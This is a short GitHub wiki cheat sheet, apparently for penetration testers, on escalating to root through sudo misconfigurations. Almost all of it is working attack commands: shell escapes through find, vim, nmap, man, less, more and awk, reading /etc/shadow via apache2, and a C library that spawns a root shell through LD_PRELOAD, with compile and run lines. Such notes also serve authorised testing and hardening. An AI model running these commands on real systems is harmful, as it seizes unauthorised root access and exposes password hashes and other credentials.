SUDO

Things to review:

What commands can a user run
Can you modify any of these binaries or files?
NOPASSWD
- Don't need to know the password
LD_PRELOAD
What commands can be run

root ALL=(ALL) ALL

List Sudo Priveleges

sudo -l

Command Privilege Escalation

##Find Command
sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;

##Vim
sudo vim -c '!sh'

##nmap
sudo nmap --interactive 
nmap> !sh

echo "os.execute('/bin/sh')" > /tmp/shell.nse &&

sudo nmap --script=/tmp/shell.nse

##man

sudo man man

!sh

##Less/More

sudo less /file

sudo more /file

!sh

##Awk

sudo awk 'BEGIN {system("/bin/sh")}'

#Apache

sudo apache2 -f /etc/shadow

LD_PRELOAD

Defaults env_keep += LD_PRELOAD

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/sh");
}

To compile:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

To execute:

sudo LD_PRELOAD=/tmp/shell.so find

Sudoers - CraigDonkin/Infrastructure GitHub Wiki

SUDO

List Sudo Priveleges

Command Privilege Escalation

LD_PRELOAD

⚠️ GitHub.com Fallback ⚠️

Sudoers - CraigDonkin/Infrastructure GitHub Wiki

SUDO

List Sudo Priveleges

Command Privilege Escalation

LD_PRELOAD

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️